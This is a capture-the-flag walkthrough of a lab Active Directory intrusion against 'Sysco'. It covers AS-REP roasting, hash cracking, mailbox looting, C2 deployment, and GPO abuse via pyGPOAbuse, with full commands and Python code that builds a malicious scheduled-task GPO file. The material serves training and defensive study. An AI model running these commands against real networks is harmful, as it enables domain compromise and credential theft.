Syk0

Sysco


This box is provided by HackSmarter https://www.hacksmarter.org/

Scenario

Sysco is a Managed Service Provider that has tasked you with performing an external penetration test against their Active Directory domain. You must obtain an initial foothold, move laterally and escalate privileges while evading antivirus detection, ultimately obtaining administrator privileges.

Objectives and Scope

The core objective of this external penetration test is to simulate a realistic, determined adversary to achieve Domain Administrator privileges within Sysco's Active Directory (AD) environment. Starting from an external position, we will focus on obtaining an initial foothold, performing lateral movement, and executing privilege escalation while successfully evading Antivirus (AV) and other security controls. This is a red-team exercise to find security weaknesses before a real attacker does.


Overview

Sysco is an Active Directory penetration testing lab simulating a Managed Service Provider environment. The engagement begins from a fully external position with no credentials and requires the tester to chain together multiple attack techniques to ultimately achieve Domain Administrator privileges.

The attack path follows a realistic adversary simulation:

  1. Recon - Port scanning reveals a domain controller. Web enumeration of a company website exposes employee names, which are converted into plausible AD usernames. Directory brute-forcing uncovers a Roundcube webmail instance.
  2. Initial Access - Kerbrute validates usernames against the DC. An AS-REP roastable account (jack.dowland) is identified, the hash is cracked offline, and the credentials are confirmed valid against SMB and Roundcube.
  3. Credential Discovery - Jack's Roundcube inbox contains a sent email to Lainey with a router config file attached. The Cisco MD5 hash inside the config is cracked, yielding the password for lainey.moore.
  4. Foothold - Lainey is a member of the Remote Desktop and Remote Management groups, allowing direct RDP access. A C2 agent is deployed to gain persistent, interactive access.
  5. Lateral Movement - Enumerating Lainey's machine reveals a PuTTY shortcut containing SSH credentials (username netadmin) for a router. The password is sprayed against the domain and turns out to be reused by greg.shields, providing lateral movement to a higher-privileged account.
  6. Privilege Escalation - Greg is a member of Group Policy Creator Owners. This group membership is abused using pyGPOAbuse to inject a malicious scheduled task into an existing GPO, which executes a C2 payload as SYSTEM when a Group Policy update is forced.

Key Techniques: AS-REP Roasting, password cracking (Hashcat), directory brute-forcing (ffuf), username enumeration (Kerbrute), Bloodhound AD enumeration, Roundcube webmail access, Cisco config hash cracking, C2 deployment (Adaptix), GPO abuse (pyGPOAbuse), DPAPI enumeration (Seatbelt).


Recon

Port Scanning

The engagement starts with a standard Nmap scan against the target IP to identify open ports and running services. Two scans are chained with &&: a default script/version scan of the top 1000 ports first, then a full port scan (-p-) to catch anything non-standard.

sudo nmap -sC -sV -vv -oA tcp 10.1.188.153 && sudo nmap -sC -sV -vv -p- -oA allports 10.1.188.153

The results are consistent with a Windows Domain Controller. Key indicators include open ports for Kerberos (88), LDAP (389/3268), SMB (445), and DNS (53), which together strongly suggest this host is a domain controller (it is later referenced as dc01.sysco.local). This narrows our focus - enumerating and exploiting AD-specific protocols will be the primary path forward.

SMB Enumeration

With a potential DC identified, we attempt to enumerate SMB shares using a null/guest session. This sometimes exposes file shares without requiring credentials.

The DC correctly rejects unauthenticated SMB enumeration, returning an access denied error. No anonymous shares are available, so we need valid credentials before we can proceed down this path.

Web Enumeration - Employee Names

The target is also hosting a website. Browsing it manually reveals a staff or team page listing real employee names. This is a common OSINT/recon finding - company websites frequently expose the very information needed to construct valid Active Directory usernames.

The names found are:

  • Greg Shields
  • Sarah Johnson
  • Jack Dowland
  • Lainey Moore

Username Generation

Raw names aren't directly usable against AD - we need to generate all plausible username formats the organization might use (e.g., firstname.lastname, flastname, firstnamel, etc.). We use namemash https://github.com/krlsio/python/blob/main/namemash.py to produce a comprehensive wordlist from the discovered names.

/opt/namemash/namemash.py users_website > generated_users

This produces the full set of username permutations for all four employees. Note that the output spells Sarah's surname as jhonson, so the input file evidently carried that typo; a misspelling in the input propagates into every permutation, so proofread the names before spraying:

gregshields
shieldsgreg
greg.shields
shields.greg
shieldsg
gshields
sgreg
g.shields
s.greg
greg
shields
sarahjhonson
jhonsonsarah
sarah.jhonson
jhonson.sarah
jhonsons
sjhonson
jsarah
s.jhonson
j.sarah
sarah
jhonson
jackdowland
dowlandjack
jack.dowland
dowland.jack
dowlandj
jdowland
djack
j.dowland
d.jack
jack
dowland
laineymoore
moorelainey
lainey.moore
moore.lainey
moorel
lmoore
mlainey
l.moore
m.lainey
lainey
moore
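The same permutation logic can be reproduced without the external script. The block below is an added example, not part of the original writeup and not namemash's own code: it emits the same eleven patterns per name shown above, normalises case and accents first (an addition), and deduplicates across names. It cannot repair a misspelled input name, which is exactly what the jhonson entries above illustrate.

```python
"""Added example (not from the writeup or namemash): build AD username
candidates from a list of 'First Last' names.  The patterns mirror the
eleven namemash forms shown above; normalisation is an addition."""
import unicodedata

PATTERNS = [
    "{first}{last}", "{last}{first}", "{first}.{last}", "{last}.{first}",
    "{last}{f}", "{f}{last}", "{l}{first}", "{f}.{last}", "{l}.{first}",
    "{first}", "{last}",
]


def normalize(token: str) -> str:
    """Lower-case, strip accents and drop anything that is not a letter,
    so 'Núñez' becomes 'nunez' and "O'Brien" becomes 'obrien'."""
    ascii_form = unicodedata.normalize("NFKD", token).encode("ascii", "ignore").decode()
    return "".join(ch for ch in ascii_form.lower() if ch.isalpha())


def permutations(full_name: str) -> list[str]:
    """Return the candidate usernames for one 'First [Middle] Last' name.
    Middle names are ignored; a single-token name yields nothing."""
    parts = [p for p in (normalize(p) for p in full_name.split()) if p]
    if len(parts) < 2:
        return []
    first, last = parts[0], parts[-1]
    return [p.format(first=first, last=last, f=first[0], l=last[0]) for p in PATTERNS]


def generate(names: list[str]) -> list[str]:
    """Union of all permutations, order preserved, duplicates removed."""
    seen, out = set(), []
    for name in names:
        for candidate in permutations(name):
            if candidate not in seen:
                seen.add(candidate)
                out.append(candidate)
    return out


# Constructed input: the four names from the staff page.
STAFF = ["Greg Shields", "Sarah Johnson", "Jack Dowland", "Lainey Moore"]

if __name__ == "__main__":
    print("\n".join(generate(STAFF)))
```

Feed the output straight into kerbrute; if the organisation uses a format outside these eleven (for example first initial plus employee number), add it to PATTERNS rather than hand-editing the list.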

Contact Form - PHP Error

While browsing the website, submitting the contact form throws a visible PHP error. This reveals backend implementation details (e.g., the PHP version, file paths, or mail handler configuration) and confirms the site is not hardened. This kind of information disclosure is a low-severity finding in its own right.

Directory Brute-Forcing - Roundcube

We brute-force the web server's directory structure to discover hidden or unlisted paths. The initial DirBuster wordlist doesn't yield anything useful.

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-big.txt -u http://10.1.188.153/FUZZ -ic -e .php

Switching to the larger raft wordlist reveals a /roundcube path - a Roundcube webmail installation. This is significant: webmail often acts as a direct window into internal communications and may contain sensitive information like credentials, config files, or internal documentation.

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://10.1.188.153/FUZZ -ic -e .php

SMB Password Spray - No Bruteforce

With a generated username list in hand, we test it against SMB. Both lists are the same file, and --no-bruteforce pairs entries index-for-index instead of trying every password against every user, so this single pass checks each account for a password equal to its own username while limiting lockout risk to one attempt per account. This pass yields no valid hits.

nxc smb sysco.local -u generated_users -p generated_users --no-bruteforce

Kerbrute - Username Validation

Even without passwords, Kerberos can tell us which usernames are valid. An AS-REQ for a non-existent principal is answered with KDC_ERR_C_PRINCIPAL_UNKNOWN, while an existing account gets KDC_ERR_PREAUTH_REQUIRED (or an AS-REP outright if pre-authentication is disabled). Kerbrute uses this difference to enumerate valid accounts; because no pre-authentication is attempted, badPwdCount is not incremented and lockouts are not triggered, although each probe does generate a 4768 event on the DC if Kerberos auditing is enabled.

kerbrute userenum --dc sysco.local -d sysco.local generated_users

Kerbrute confirms several valid usernames against the domain. We save the confirmed accounts to a file (users), which narrows the wordlist considerably for targeted attacks.

AS-REP Roasting

Some AD accounts are configured with the DONT_REQUIRE_PREAUTH flag in userAccountControl, meaning the KDC will return an AS-REP without first requiring the client to prove knowledge of the password. Part of that AS-REP is encrypted with a key derived from the account's password, so it can be captured and cracked offline - a technique called AS-REP Roasting.

We use NetExec to check for and harvest any roastable hashes:

nxc ldap sysco.local -u users -p '' --asreproast asrep_hashes

jack.dowland is AS-REP roastable, and we capture his encrypted ticket hash.

Cracking the AS-REP Hash

The captured hash is cracked offline using Hashcat with the mode 18200 (Kerberos 5 AS-REP etype 23) against the rockyou wordlist.

hashcat -m 18200 -a 0 asrep_hashes /mnt/hgfs/I/data/rockyou.txt
[email protected]:d7499800e4201b8789420938894a580c$c1555e49bf0ae554f51611edba311b72c52c26d2f63b55dabbd40f7c24e331f55cf8c2a8dec3f253b7a223864ee1a6536b3b07aa3d6bb230b1985f5f4b6eb35eb8080ef34440142dc4643ba154f7cf4fbb20614f5709e67e4cb7ab38e26ea04961625a6d733b1045fce327fac3fb5f4fe6a93ef36e5c3755cafc678e9c45fbf93a31b867ed7b0495f9c077ccbb3f79fd2f814c219fe085fa4d4ccacdcd582ee5e768996aa3d6a9df4c607daeb5b19ee7901d1f6de733e030ff5f52d7e094950e00ca333d38fbcde0602923df14078764b34f50481a2340af77abd6cb3b6b5fa76ca83c752c108f9837a9:musicman1

The password cracks to musicman1. We now have valid domain credentials: jack.dowland:musicman1.

Confirming Access - SMB Spider and Roundcube

With valid credentials, we re-test SMB access and use the spider_plus module to enumerate every share Jack can read and list their contents. This is a quick way to map what data the account can reach across the network.

nxc smb sysco.local -u jack.dowland -p musicman1 -M spider_plus

We also test the credentials against Roundcube webmail, and they work - giving us access to Jack's email inbox.

Roundcube - Sent Email with Router Config

Browsing Jack's mailbox, we check the Sent folder and find an email Jack sent to Lainey containing an attached file: router2.cfg - a Cisco router configuration file.

Inside the config file, there is a Cisco-formatted password hash (using the enable secret or username secret syntax). The origin or intended use of this secret string is not immediately clear, but it's worth keeping for later.

Bloodhound - AD Enumeration

Bloodhound maps Active Directory relationships and attack paths by ingesting data collected by bloodhound-python. This helps identify privilege escalation routes, group memberships, ACL abuses, and delegation misconfigurations that aren't obvious from manual enumeration.

bloodhound-python -c all -u jack.dowland -p musicman1 -k -d sysco.local -dc dc01.sysco.local --dns-tcp -ns 10.1.188.153

At this point, Bloodhound doesn't reveal a direct path to DA from Jack's account. However, the data confirms that Greg Shields is a sysadmin, and that Lainey Moore has both RDP and Remote Management (WinRM) access to at least one machine. These become important targets.

Cracking the Cisco Router Hash

With no direct Bloodhound path, we return to the router2.cfg file. The Cisco-formatted secret is identified as a Cisco MD5 hash (type 5, using the $1$ prefix format). These are crackable with Hashcat using mode 500.

hashcat -m 500 -a 0 cisco_hash /mnt/hgfs/I/data/rockyou.txt

The hash cracks to Chocolate1.

We spray this password against the domain using NetExec and confirm it belongs to lainey.moore.
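Router configs usually carry more than one kind of secret, and not all of them need cracking. The block below is an added example (not part of the writeup and not tied to the real router2.cfg): it pulls the credential lines out of a Cisco IOS-style config, labels each by Cisco type, maps type 5/8/9 to the hashcat mode that cracks it, and decodes type 7 directly, since type 7 is a reversible XOR obfuscation rather than a hash. It goes beyond the page's single type 5 case on purpose. SAMPLE_CONFIG and every hash in it are constructed placeholders; the type 7 values are the only ones that decode to anything.

```python
"""Added example (not from the writeup): triage the password material in a
Cisco IOS-style config.  It labels each secret by Cisco 'type', maps it to
the hashcat mode that cracks it, and decodes type 7 (obfuscation, not a
hash) on the spot.  SAMPLE_CONFIG is constructed for this example."""
import re

# Cisco type -> (what it is, hashcat mode; None when no cracking is needed)
CISCO_TYPES = {
    "0": ("cleartext", None),
    "5": ("MD5-crypt, $1$ prefix", 500),
    "7": ("type 7 XOR obfuscation, reversible", None),
    "8": ("PBKDF2-HMAC-SHA256, $8$ prefix", 9200),
    "9": ("scrypt, $9$ prefix", 9300),
}

# Fixed key of the type 7 scheme; the first two decimal digits of the
# ciphertext give the starting offset into it.
TYPE7_XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(enc: str) -> str:
    """Reverse a type 7 string: each hex byte is XORed with the key stream."""
    seed = int(enc[:2])
    out = []
    for i, pos in enumerate(range(2, len(enc), 2)):
        byte = int(enc[pos:pos + 2], 16)
        out.append(chr(byte ^ ord(TYPE7_XLAT[(seed + i) % len(TYPE7_XLAT)])))
    return "".join(out)


def encode_type7(plain: str, seed: int = 3) -> str:
    """Inverse of decode_type7, handy for confirming the key stream is right."""
    body = "".join(
        f"{ord(c) ^ ord(TYPE7_XLAT[(seed + i) % len(TYPE7_XLAT)]):02X}"
        for i, c in enumerate(plain)
    )
    return f"{seed:02d}{body}"


# Matches 'enable secret|password T ...', 'username X [privilege N] secret|password T ...'
# and a bare ' password T ...' inside a line/console stanza.
LINE_RE = re.compile(
    r"^\s*(?:username\s+(?P<user>\S+)(?:\s+privilege\s+\d+)?\s+|enable\s+)?"
    r"(?:secret|password)\s+(?P<type>\d)\s+(?P<value>\S+)"
)


def extract_secrets(config: str) -> list[dict]:
    """Return one record per credential line found in the config."""
    findings = []
    for line in config.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        t = m.group("type")
        algo, mode = CISCO_TYPES.get(t, (f"unknown type {t}", None))
        if m.group("user"):
            account = m.group("user")
        elif line.lstrip().startswith("enable"):
            account = "enable"
        else:
            account = "line"
        recovered = None
        if t == "7":
            recovered = decode_type7(m.group("value"))
        elif t == "0":
            recovered = m.group("value")
        findings.append({"account": account, "type": t, "algorithm": algo,
                         "hashcat_mode": mode, "value": m.group("value"),
                         "recovered": recovered})
    return findings


# Constructed sample; the $1$ and $9$ values are placeholders, not real hashes.
SAMPLE_CONFIG = """\
hostname router2
enable secret 5 $1$Zf9q$7xT4uJ3vKkLq2bWxYhN8p1
username netadmin privilege 15 password 7 0822455D0A16
username greg.shields secret 5 $1$Qm2c$Hd8sLk1pRz4vTy6wXe0bN/
username backup secret 9 $9$saltsaltsaltsa$placeholderhashplaceholderhashplaceholderha
line vty 0 4
 password 7 030C5A080D1C2C4D5C1D1C17
"""

if __name__ == "__main__":
    for finding in extract_secrets(SAMPLE_CONFIG):
        print(finding)
```

Anything reported with hashcat_mode set goes to hashcat with that mode (type 5 is the -m 500 case used above); anything reported with a recovered value is ready to spray, and a type 7 line found in a real config is a finding on its own, since service password-encryption gives no real protection.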


Foothold

RDP as Lainey Moore

Since Lainey is a member of both the Remote Desktop Users and Remote Management Users groups (confirmed via Bloodhound), we can log into her workstation directly over RDP using Remmina.

This gives us an interactive desktop session as lainey.moore. We retrieve the user flag from her desktop or user profile:

5efd12c8bc80b6882fa86f5698b14dc6

System Information

With an interactive session, we check the machine's system information to understand the OS version, architecture, patch level, and domain membership. This informs which privilege escalation techniques may be applicable.

C2 Agent Deployment

To maintain persistent, flexible access beyond the RDP session, we generate an Adaptix C2 agent, transfer it to the machine, and execute it as Lainey. Adaptix is a C2 framework that provides an interactive implant with post-exploitation capabilities.

The agent checks in, giving us a beacon as lainey.moore in the Adaptix console.


Lateral Movement

Enumerating Lainey's Machine

With an active C2 agent, we enumerate Lainey's user profile, desktop, documents, and application data for any sensitive material. Particular attention is paid to browser-saved credentials, application config files, and shortcut (.lnk) files, which sometimes store connection details inline.

PuTTY Shortcut - SSH Credentials for Greg

Enumeration reveals a PuTTY shortcut file: Putty - HS Router login.lnk. Inspecting this shortcut exposes the SSH username and password that Lainey (or whoever configured it) used to connect to a router. The password turns out to be reused by greg.shields, as the next step confirms.

Password Validation for Greg Shields

SSH (port 22) isn't open on the DC, so we can't use the credentials there directly. Instead, we spray Greg's newly discovered password across common protocols using NetExec to see where it's valid within the domain.

RDP as Greg Shields + New C2 Agent

The credentials work, and since Greg also has RDP access, we connect to the machine as Greg. A new Adaptix C2 agent is deployed and executed under Greg's context, giving us a second beacon - this time as a more privileged user.


Privilege Escalation

Seatbelt Enumeration

Seatbelt is a C# post-exploitation enumeration tool that checks dozens of security-relevant settings, configurations, and artefacts on a Windows host. We run it through the Adaptix agent to survey the machine's attack surface from Greg's perspective.

DPAPI Keys

Seatbelt identifies DPAPI (Data Protection API) master keys on the machine. DPAPI is used by Windows to encrypt secrets like saved browser credentials, WiFi passwords, and certificate private keys. While nothing immediately actionable is found here, the keys are noted for potential offline decryption if a higher-privileged context is obtained.

GPO Abuse - Group Policy Creator Owners

The pivotal finding: Greg is a member of the Group Policy Creator Owners group. By default this membership lets members create new GPOs (and edit the ones they created); it does not by itself grant write access to pre-existing GPOs, so in a real engagement confirm first (for example via BloodHound's GenericWrite/WriteDacl/WriteOwner edges to the GPO) that the account can actually write the target GPO. Here the edit goes through. By injecting a malicious scheduled task into an existing GPO - specifically the Default Domain Policy (31B2F340-016D-11D2-945F-00C04FB984F9), which is linked at the domain root and therefore applied by every domain-joined computer, including the DC - we can force code execution as SYSTEM on any machine that applies the policy.

We use pyGPOAbuse to add a scheduled task to the GPO that executes our pre-staged C2 agent binary (ag.exe) from C:\Windows\Tasks\:

python3 pygpoabuse.py sysco.local/greg.shields:'5y5coSmarter2025!!!' -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -command 'C:\\Windows\\Tasks\\ag.exe'

Forcing a Group Policy Update

GPOs are normally applied on a schedule: every 90 minutes plus a random offset of up to 30 minutes on workstations and member servers, and every 5 minutes on domain controllers. To trigger the payload immediately, we force a Group Policy refresh from our RDP session on the target machine with gpupdate /force.

SYSTEM Beacon

The forced refresh makes the DC apply the modified GPO, which registers and immediately runs ag.exe as SYSTEM. Within seconds a new beacon appears in the Adaptix console as NT AUTHORITY\SYSTEM. SYSTEM on a domain controller amounts to full domain compromise, so Domain Administrator level access has been achieved.
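To make the GPO step concrete from both sides, here is an added example in Python. It is not code from the writeup or from pyGPOAbuse: it builds the Group Policy Preferences ScheduledTasks.xml that an immediate-task GPO abuse drops into SYSVOL, scans a file of that shape for tasks running as SYSTEM (the defender's check), and shows the gpt.ini version bump that makes clients re-apply the policy. Element names and CLSIDs follow the GPP scheduled-task format; that pyGPOAbuse writes exactly this XML is an assumption, and the function names are mine.

```python
"""Added example (not from the writeup or pyGPOAbuse): what an "immediate
scheduled task" GPO abuse leaves behind in SYSVOL, and how to spot it.
Element names and CLSIDs follow the Group Policy Preferences scheduled-task
format; the exact XML a given tool writes may differ in detail (assumption)."""
import re
import uuid
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

GPP_SCHEDTASKS_CLSID = "{CC63F200-7309-4ba0-B154-A71CD118DBCC}"
IMMEDIATE_TASK_CLSID = "{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}"
SYSTEM_ACCOUNT = "NT AUTHORITY\\System"
DEFAULT_DOMAIN_POLICY = "{31B2F340-016D-11D2-945F-00C04FB984F9}"


def sysvol_task_path(domain: str, gpo_id: str) -> str:
    """Where the machine-side scheduled-task preferences of a GPO live."""
    return ("\\\\{0}\\SYSVOL\\{0}\\Policies\\{1}\\Machine\\Preferences"
            "\\ScheduledTasks\\ScheduledTasks.xml").format(domain, gpo_id)


def build_immediate_task_xml(task_name: str, command: str, arguments: str = "") -> str:
    """ScheduledTasks.xml with one ImmediateTaskV2 that runs `command` as
    SYSTEM the next time a computer applies the policy."""
    stamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
    root = ET.Element("ScheduledTasks", clsid=GPP_SCHEDTASKS_CLSID)
    task = ET.SubElement(root, "ImmediateTaskV2", clsid=IMMEDIATE_TASK_CLSID,
                         name=task_name, image="0", changed=stamp,
                         uid="{%s}" % str(uuid.uuid4()).upper())
    props = ET.SubElement(task, "Properties", action="C", name=task_name,
                          runAs=SYSTEM_ACCOUNT, logonType="S4U")
    t = ET.SubElement(props, "Task", version="1.3")
    principal = ET.SubElement(ET.SubElement(t, "Principals"), "Principal", id="Author")
    ET.SubElement(principal, "UserId").text = SYSTEM_ACCOUNT
    ET.SubElement(principal, "RunLevel").text = "HighestAvailable"
    ET.SubElement(principal, "LogonType").text = "S4U"
    settings = ET.SubElement(t, "Settings")
    ET.SubElement(settings, "AllowStartOnDemand").text = "true"
    ET.SubElement(settings, "Enabled").text = "true"
    ET.SubElement(settings, "DeleteExpiredTaskAfter").text = "PT0S"  # task removes itself
    exe = ET.SubElement(ET.SubElement(t, "Actions", Context="Author"), "Exec")
    ET.SubElement(exe, "Command").text = command
    ET.SubElement(exe, "Arguments").text = arguments
    return '<?xml version="1.0" encoding="utf-8"?>\n' + ET.tostring(root, encoding="unicode")


def find_system_tasks(xml_text: str) -> list[dict]:
    """List every task in a ScheduledTasks.xml and flag those running as SYSTEM."""
    hits = []
    for task in ET.fromstring(xml_text.encode("utf-8")):
        props = task.find("Properties")
        if props is None:
            continue
        run_as = props.get("runAs", "")
        exe = props.find("Task/Actions/Exec")
        hits.append({
            "kind": task.tag,  # ImmediateTaskV2 fires once at the next refresh
            "name": props.get("name"),
            "run_as": run_as,
            "command": exe.findtext("Command") if exe is not None else None,
            "arguments": exe.findtext("Arguments") if exe is not None else None,
            "is_system": run_as.upper() in ("NT AUTHORITY\\SYSTEM", "SYSTEM"),
        })
    return hits


def split_gpt_version(version: int) -> tuple[int, int]:
    """gpt.ini 'Version=' packs the user half (high 16 bits) and the
    computer half (low 16 bits); returns (user, computer)."""
    return version >> 16, version & 0xFFFF


def bump_computer_version(gpt_ini: str) -> str:
    """Increment the computer half of Version= so clients re-apply the GPO.
    Adding 1 touches only the low 16 bits; an unexplained jump in this
    counter is itself a detection signal."""
    return re.sub(r"Version=(\d+)",
                  lambda m: f"Version={int(m.group(1)) + 1}", gpt_ini, count=1)


if __name__ == "__main__":
    xml_text = build_immediate_task_xml("ag", "C:\\Windows\\Tasks\\ag.exe")
    print(sysvol_task_path("sysco.local", DEFAULT_DOMAIN_POLICY))
    for hit in find_system_tasks(xml_text):
        print(hit)
```

The SYSVOL file is only half of the change: clients compare the version in gpt.ini with the versionNumber attribute of the groupPolicyContainer object in AD, so both must be incremented for the policy to be reapplied (the tool does both; the example shows only the SYSVOL half). For defenders, the practical checks are file writes under Policies\*\Machine\Preferences\ScheduledTasks\ in SYSVOL, GPO versionNumber changes not matching a change ticket, and any runAs of NT AUTHORITY\System in a preference task, especially inside the two default GPOs.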